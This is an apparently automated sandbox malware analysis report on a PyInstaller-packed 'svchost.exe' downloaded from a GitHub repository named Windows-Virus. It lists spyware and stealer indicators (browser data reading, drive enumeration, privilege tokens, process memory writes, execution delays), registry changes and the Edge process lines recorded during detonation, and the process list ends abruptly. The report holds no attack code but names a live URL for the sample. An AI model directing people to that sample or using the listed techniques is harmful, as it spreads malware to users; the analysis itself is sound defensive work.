Malware Analysis Report

2025-05-05 21:21

Sample ID 240510-r166daec25
Target https://github.com/erfan4lx/Windows-Virus/blob/master/svchost.exe
Tags
pyinstaller spyware stealer
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

Threat Level: Likely malicious

The file https://github.com/erfan4lx/Windows-Virus/blob/master/svchost.exe was found to be: Likely malicious.

Malicious Activity Summary

pyinstaller spyware stealer

Downloads MZ/PE file

Loads dropped DLL

Executes dropped EXE

Reads user/profile data of web browsers

Enumerates connected drives

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Detects Pyinstaller

Views/modifies file attributes

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Modifies data under HKEY_USERS

NTFS ADS

Delays execution with timeout.exe

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-10 14:40

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-10 14:40

Reported

2024-05-10 14:43

Platform

win10v2004-20240426-en

Max time kernel

173s

Max time network

162s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/erfan4lx/Windows-Virus/blob/master/svchost.exe

Signatures

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\svchost.exe N/A
N/A N/A C:\Users\Admin\Downloads\svchost.exe N/A

Reads user/profile data of web browsers

spyware stealer

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\P: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\cacls.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\cacls.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\Recovery\ReAgent.xml C:\Windows\system32\bootim.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jre-1.8\bin\server\classes.jsa C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa C:\Windows\system32\cmd.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Globalization\ICU\icudtl.dat C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\setupact.log C:\Windows\system32\bootim.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log C:\Windows\system32\bootim.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml C:\Windows\system32\bootim.exe N/A
File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml C:\Windows\system32\bootim.exe N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History C:\Windows\system32\LogonUI.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "237" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" C:\Windows\system32\LogonUI.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 207892.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\bootim.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\bootim.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\mmc.exe N/A
N/A N/A C:\Windows\system32\LogonUI.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4044 wrote to memory of 4064 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 4064 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 3752 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 2084 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 2084 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 2084 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 2084 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 2084 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 2084 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 2084 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 2084 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 2084 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 2084 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 2084 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 2084 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 2084 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 2084 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 2084 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 2084 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 2084 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 2084 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 2084 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4044 wrote to memory of 2084 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/erfan4lx/Windows-Virus/blob/master/svchost.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd6d1046f8,0x7ffd6d104708,0x7ffd6d104718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2056 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2436 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2644 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5244 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5244 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5468 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2044,9246953896168190392,14212502543256234961,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6060 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

